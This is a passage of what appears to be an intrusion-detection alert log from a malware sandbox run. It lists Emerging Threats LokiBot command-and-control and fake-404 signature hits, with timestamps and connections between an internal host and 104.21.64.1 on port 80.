2025-03-05T15:20:14.386360+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65196	104.21.64.1	80	TCP
2025-03-05T15:20:15.186189+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65197	104.21.64.1	80	TCP
2025-03-05T15:20:16.090928+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65198	104.21.64.1	80	TCP
2025-03-05T15:20:17.018044+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65199	104.21.64.1	80	TCP
2025-03-05T15:20:17.962682+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65200	104.21.64.1	80	TCP
2025-03-05T15:20:19.009901+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65201	104.21.64.1	80	TCP
2025-03-05T15:20:19.808283+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65202	104.21.64.1	80	TCP
2025-03-05T15:20:20.620992+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65203	104.21.64.1	80	TCP
2025-03-05T15:20:21.557064+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65204	104.21.64.1	80	TCP
2025-03-05T15:20:22.355800+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65206	104.21.64.1	80	TCP
2025-03-05T15:20:23.305471+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65207	104.21.64.1	80	TCP
2025-03-05T15:20:24.247512+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65208	104.21.64.1	80	TCP
2025-03-05T15:20:25.161067+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65209	104.21.64.1	80	TCP
2025-03-05T15:20:26.048586+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65210	104.21.64.1	80	TCP
2025-03-05T15:20:26.977865+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65211	104.21.64.1	80	TCP
2025-03-05T15:20:27.854049+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65212	104.21.64.1	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T15:18:40.888221+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	64910	TCP
2025-03-05T15:18:43.237325+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	64922	TCP
2025-03-05T15:18:44.192134+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	64933	TCP
2025-03-05T15:18:45.113559+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	64939	TCP
2025-03-05T15:18:46.042959+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	64944	TCP
2025-03-05T15:18:48.989760+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	64967	TCP
2025-03-05T15:18:50.215790+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	64973	TCP
2025-03-05T15:18:52.043200+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	64984	TCP
2025-03-05T15:18:53.162548+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	64989	TCP
2025-03-05T15:18:54.099952+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	64998	TCP
2025-03-05T15:18:55.030101+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65004	TCP
2025-03-05T15:18:57.761353+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65023	TCP
2025-03-05T15:19:03.279559+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65064	TCP
2025-03-05T15:19:05.483667+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65075	TCP
2025-03-05T15:19:06.434147+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65081	TCP
2025-03-05T15:19:09.229706+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65101	TCP
2025-03-05T15:19:10.177893+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65110	TCP
2025-03-05T15:19:11.127664+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65116	TCP
2025-03-05T15:19:12.130458+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65124	TCP
2025-03-05T15:19:13.176390+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65129	TCP
2025-03-05T15:19:14.166065+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65130	TCP
2025-03-05T15:19:15.373599+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65131	TCP
2025-03-05T15:19:19.207865+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65136	TCP
2025-03-05T15:19:23.100760+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65140	TCP
2025-03-05T15:19:25.710720+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65143	TCP
2025-03-05T15:19:28.262592+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65147	TCP
2025-03-05T15:19:29.200860+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65148	TCP
2025-03-05T15:19:32.174191+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65151	TCP
2025-03-05T15:19:33.107852+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65152	TCP
2025-03-05T15:19:34.052019+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65153	TCP
2025-03-05T15:19:35.967519+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65155	TCP
2025-03-05T15:19:38.140427+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65157	TCP
2025-03-05T15:19:39.079235+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65158	TCP
2025-03-05T15:19:41.430866+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65160	TCP
2025-03-05T15:19:42.394425+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65161	TCP
2025-03-05T15:19:43.191645+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65162	TCP
2025-03-05T15:19:44.392327+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65163	TCP
2025-03-05T15:19:47.299755+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65166	TCP
2025-03-05T15:19:51.221639+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65170	TCP
2025-03-05T15:19:53.113781+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65173	TCP
2025-03-05T15:19:54.476149+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65174	TCP
2025-03-05T15:19:55.412105+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65175	TCP
2025-03-05T15:19:57.429957+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65177	TCP
2025-03-05T15:19:58.257483+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65178	TCP
2025-03-05T15:19:59.252827+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65179	TCP
2025-03-05T15:20:01.133161+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65181	TCP
2025-03-05T15:20:02.058177+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65182	TCP
2025-03-05T15:20:03.515439+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65183	TCP
2025-03-05T15:20:04.317273+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65184	TCP
2025-03-05T15:20:05.242228+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65185	TCP
2025-03-05T15:20:06.174294+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65186	TCP
2025-03-05T15:20:07.115735+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65187	TCP
2025-03-05T15:20:08.831439+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65189	TCP
2025-03-05T15:20:10.688089+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65191	TCP
2025-03-05T15:20:12.626283+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65193	TCP
2025-03-05T15:20:13.448641+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65194	TCP
2025-03-05T15:20:14.235290+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65195	TCP
2025-03-05T15:20:15.028573+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65196	TCP
2025-03-05T15:20:16.719257+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65198	TCP
2025-03-05T15:20:18.867298+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65200	TCP
2025-03-05T15:20:19.656496+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65201	TCP
2025-03-05T15:20:20.471755+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65202	TCP
2025-03-05T15:20:22.203139+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65204	TCP
2025-03-05T15:20:23.149552+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65206	TCP
2025-03-05T15:20:24.093829+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65207	TCP
2025-03-05T15:20:26.816502+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65210	TCP
2025-03-05T15:20:27.622095+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65211	TCP
2025-03-05T15:20:28.647945+0100	2025483	1	A Network Trojan was detected	104.21.64.1	80	192.168.2.6	65212	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T15:18:40.883150+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64910	104.21.64.1	80	TCP
2025-03-05T15:18:41.812328+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64916	104.21.64.1	80	TCP
2025-03-05T15:18:43.232237+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64922	104.21.64.1	80	TCP
2025-03-05T15:18:44.187039+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64933	104.21.64.1	80	TCP
2025-03-05T15:18:45.108512+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64939	104.21.64.1	80	TCP
2025-03-05T15:18:46.037933+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64944	104.21.64.1	80	TCP
2025-03-05T15:18:46.943091+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64951	104.21.64.1	80	TCP
2025-03-05T15:18:48.061329+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64957	104.21.64.1	80	TCP
2025-03-05T15:18:48.981639+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64967	104.21.64.1	80	TCP
2025-03-05T15:18:50.210815+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64973	104.21.64.1	80	TCP
2025-03-05T15:18:51.096101+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64979	104.21.64.1	80	TCP
2025-03-05T15:18:52.037668+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64984	104.21.64.1	80	TCP
2025-03-05T15:18:53.155980+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64989	104.21.64.1	80	TCP
2025-03-05T15:18:54.091657+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	64998	104.21.64.1	80	TCP
2025-03-05T15:18:55.025117+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65004	104.21.64.1	80	TCP
2025-03-05T15:18:55.939662+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65011	104.21.64.1	80	TCP
2025-03-05T15:18:56.827959+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65017	104.21.64.1	80	TCP
2025-03-05T15:18:57.756134+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65023	104.21.64.1	80	TCP
2025-03-05T15:18:58.653429+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65031	104.21.64.1	80	TCP
2025-03-05T15:18:59.537104+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65039	104.21.64.1	80	TCP
2025-03-05T15:19:00.449249+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65045	104.21.64.1	80	TCP
2025-03-05T15:19:01.377131+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65051	104.21.64.1	80	TCP
2025-03-05T15:19:02.337807+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65057	104.21.64.1	80	TCP
2025-03-05T15:19:03.274511+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65064	104.21.64.1	80	TCP
2025-03-05T15:19:04.538072+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65070	104.21.64.1	80	TCP
2025-03-05T15:19:05.478651+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65075	104.21.64.1	80	TCP
2025-03-05T15:19:06.429097+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65081	104.21.64.1	80	TCP
2025-03-05T15:19:07.348601+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65089	104.21.64.1	80	TCP
2025-03-05T15:19:08.279751+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65095	104.21.64.1	80	TCP
2025-03-05T15:19:09.224211+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65101	104.21.64.1	80	TCP
2025-03-05T15:19:10.170730+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65110	104.21.64.1	80	TCP
2025-03-05T15:19:11.122609+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65116	104.21.64.1	80	TCP
2025-03-05T15:19:12.121526+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65124	104.21.64.1	80	TCP
2025-03-05T15:19:13.170610+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65129	104.21.64.1	80	TCP
2025-03-05T15:19:14.160231+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65130	104.21.64.1	80	TCP
2025-03-05T15:19:15.368532+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65131	104.21.64.1	80	TCP
2025-03-05T15:19:16.279063+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65133	104.21.64.1	80	TCP
2025-03-05T15:19:17.197945+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65134	104.21.64.1	80	TCP
2025-03-05T15:19:18.276958+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65135	104.21.64.1	80	TCP
2025-03-05T15:19:19.202726+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65136	104.21.64.1	80	TCP
2025-03-05T15:19:20.116320+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65137	104.21.64.1	80	TCP
2025-03-05T15:19:21.250327+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65138	104.21.64.1	80	TCP
2025-03-05T15:19:22.138775+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65139	104.21.64.1	80	TCP
2025-03-05T15:19:23.095757+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65140	104.21.64.1	80	TCP
2025-03-05T15:19:23.989733+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65141	104.21.64.1	80	TCP
2025-03-05T15:19:24.875713+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65142	104.21.64.1	80	TCP
2025-03-05T15:19:25.705571+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65143	104.21.64.1	80	TCP
2025-03-05T15:19:26.584565+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65144	104.21.64.1	80	TCP
2025-03-05T15:19:27.462057+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65146	104.21.64.1	80	TCP
2025-03-05T15:19:28.257570+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65147	104.21.64.1	80	TCP
2025-03-05T15:19:29.195892+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65148	104.21.64.1	80	TCP
2025-03-05T15:19:30.124205+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65149	104.21.64.1	80	TCP
2025-03-05T15:19:31.006967+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65150	104.21.64.1	80	TCP
2025-03-05T15:19:32.169047+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65151	104.21.64.1	80	TCP
2025-03-05T15:19:33.102834+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65152	104.21.64.1	80	TCP
2025-03-05T15:19:34.047005+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65153	104.21.64.1	80	TCP
2025-03-05T15:19:35.026750+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65154	104.21.64.1	80	TCP
2025-03-05T15:19:35.962529+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65155	104.21.64.1	80	TCP
2025-03-05T15:19:36.863885+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65156	104.21.64.1	80	TCP
2025-03-05T15:19:38.135421+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65157	104.21.64.1	80	TCP
2025-03-05T15:19:39.073048+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65158	104.21.64.1	80	TCP
2025-03-05T15:19:39.992413+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65159	104.21.64.1	80	TCP
2025-03-05T15:19:41.425752+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65160	104.21.64.1	80	TCP
2025-03-05T15:19:42.389060+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65161	104.21.64.1	80	TCP
2025-03-05T15:19:43.183681+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65162	104.21.64.1	80	TCP
2025-03-05T15:19:44.386416+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65163	104.21.64.1	80	TCP
2025-03-05T15:19:45.353491+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65164	104.21.64.1	80	TCP
2025-03-05T15:19:46.340342+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65165	104.21.64.1	80	TCP
2025-03-05T15:19:47.294793+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65166	104.21.64.1	80	TCP
2025-03-05T15:19:48.243461+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65167	104.21.64.1	80	TCP
2025-03-05T15:19:49.154764+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65168	104.21.64.1	80	TCP
2025-03-05T15:19:50.060267+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65169	104.21.64.1	80	TCP
2025-03-05T15:19:51.216566+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65170	104.21.64.1	80	TCP
2025-03-05T15:19:52.152767+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65172	104.21.64.1	80	TCP
2025-03-05T15:19:53.105466+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65173	104.21.64.1	80	TCP
2025-03-05T15:19:54.471150+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65174	104.21.64.1	80	TCP
2025-03-05T15:19:55.406296+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65175	104.21.64.1	80	TCP
2025-03-05T15:19:56.347184+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65176	104.21.64.1	80	TCP
2025-03-05T15:19:57.424926+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65177	104.21.64.1	80	TCP
2025-03-05T15:19:58.251673+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65178	104.21.64.1	80	TCP
2025-03-05T15:19:59.247783+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65179	104.21.64.1	80	TCP
2025-03-05T15:20:00.146884+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65180	104.21.64.1	80	TCP
2025-03-05T15:20:01.128006+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65181	104.21.64.1	80	TCP
2025-03-05T15:20:02.053165+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65182	104.21.64.1	80	TCP
2025-03-05T15:20:03.510396+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65183	104.21.64.1	80	TCP
2025-03-05T15:20:04.309993+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65184	104.21.64.1	80	TCP
2025-03-05T15:20:05.237152+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65185	104.21.64.1	80	TCP
2025-03-05T15:20:06.169211+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65186	104.21.64.1	80	TCP
2025-03-05T15:20:07.110630+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65187	104.21.64.1	80	TCP
2025-03-05T15:20:08.024772+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65188	104.21.64.1	80	TCP
2025-03-05T15:20:08.826439+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65189	104.21.64.1	80	TCP
2025-03-05T15:20:09.712800+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65190	104.21.64.1	80	TCP
2025-03-05T15:20:10.681569+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65191	104.21.64.1	80	TCP
2025-03-05T15:20:11.596097+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65192	104.21.64.1	80	TCP
2025-03-05T15:20:12.621094+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65193	104.21.64.1	80	TCP
2025-03-05T15:20:13.439097+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65194	104.21.64.1	80	TCP
2025-03-05T15:20:14.230324+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65195	104.21.64.1	80	TCP
2025-03-05T15:20:15.023409+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65196	104.21.64.1	80	TCP
2025-03-05T15:20:15.935758+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65197	104.21.64.1	80	TCP
2025-03-05T15:20:16.714135+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65198	104.21.64.1	80	TCP
2025-03-05T15:20:17.814099+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65199	104.21.64.1	80	TCP
2025-03-05T15:20:18.862264+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65200	104.21.64.1	80	TCP
2025-03-05T15:20:19.651383+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65201	104.21.64.1	80	TCP
2025-03-05T15:20:20.465849+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65202	104.21.64.1	80	TCP
2025-03-05T15:20:21.398976+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65203	104.21.64.1	80	TCP
2025-03-05T15:20:22.198041+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65204	104.21.64.1	80	TCP
2025-03-05T15:20:23.144519+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65206	104.21.64.1	80	TCP
2025-03-05T15:20:24.088760+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65207	104.21.64.1	80	TCP
2025-03-05T15:20:25.002799+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65208	104.21.64.1	80	TCP
2025-03-05T15:20:25.892176+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65209	104.21.64.1	80	TCP
2025-03-05T15:20:26.809669+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65210	104.21.64.1	80	TCP
2025-03-05T15:20:27.617094+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65211	104.21.64.1	80	TCP
2025-03-05T15:20:28.642456+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	65212	104.21.64.1	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T15:18:40.883150+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64910	104.21.64.1	80	TCP
2025-03-05T15:18:41.812328+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64916	104.21.64.1	80	TCP
2025-03-05T15:18:43.232237+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64922	104.21.64.1	80	TCP
2025-03-05T15:18:44.187039+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64933	104.21.64.1	80	TCP
2025-03-05T15:18:45.108512+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64939	104.21.64.1	80	TCP
2025-03-05T15:18:46.037933+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64944	104.21.64.1	80	TCP
2025-03-05T15:18:46.943091+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64951	104.21.64.1	80	TCP
2025-03-05T15:18:48.061329+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64957	104.21.64.1	80	TCP
2025-03-05T15:18:48.981639+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64967	104.21.64.1	80	TCP
2025-03-05T15:18:50.210815+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64973	104.21.64.1	80	TCP
2025-03-05T15:18:51.096101+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64979	104.21.64.1	80	TCP
2025-03-05T15:18:52.037668+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64984	104.21.64.1	80	TCP
2025-03-05T15:18:53.155980+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64989	104.21.64.1	80	TCP
2025-03-05T15:18:54.091657+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	64998	104.21.64.1	80	TCP
2025-03-05T15:18:55.025117+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65004	104.21.64.1	80	TCP
2025-03-05T15:18:55.939662+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65011	104.21.64.1	80	TCP
2025-03-05T15:18:56.827959+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65017	104.21.64.1	80	TCP
2025-03-05T15:18:57.756134+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65023	104.21.64.1	80	TCP
2025-03-05T15:18:58.653429+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65031	104.21.64.1	80	TCP
2025-03-05T15:18:59.537104+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65039	104.21.64.1	80	TCP
2025-03-05T15:19:00.449249+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65045	104.21.64.1	80	TCP
2025-03-05T15:19:01.377131+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65051	104.21.64.1	80	TCP
2025-03-05T15:19:02.337807+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65057	104.21.64.1	80	TCP
2025-03-05T15:19:03.274511+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65064	104.21.64.1	80	TCP
2025-03-05T15:19:04.538072+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65070	104.21.64.1	80	TCP
2025-03-05T15:19:05.478651+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65075	104.21.64.1	80	TCP
2025-03-05T15:19:06.429097+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65081	104.21.64.1	80	TCP
2025-03-05T15:19:07.348601+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65089	104.21.64.1	80	TCP
2025-03-05T15:19:08.279751+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65095	104.21.64.1	80	TCP
2025-03-05T15:19:09.224211+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65101	104.21.64.1	80	TCP
2025-03-05T15:19:10.170730+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65110	104.21.64.1	80	TCP
2025-03-05T15:19:11.122609+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65116	104.21.64.1	80	TCP
2025-03-05T15:19:12.121526+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65124	104.21.64.1	80	TCP
2025-03-05T15:19:13.170610+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65129	104.21.64.1	80	TCP
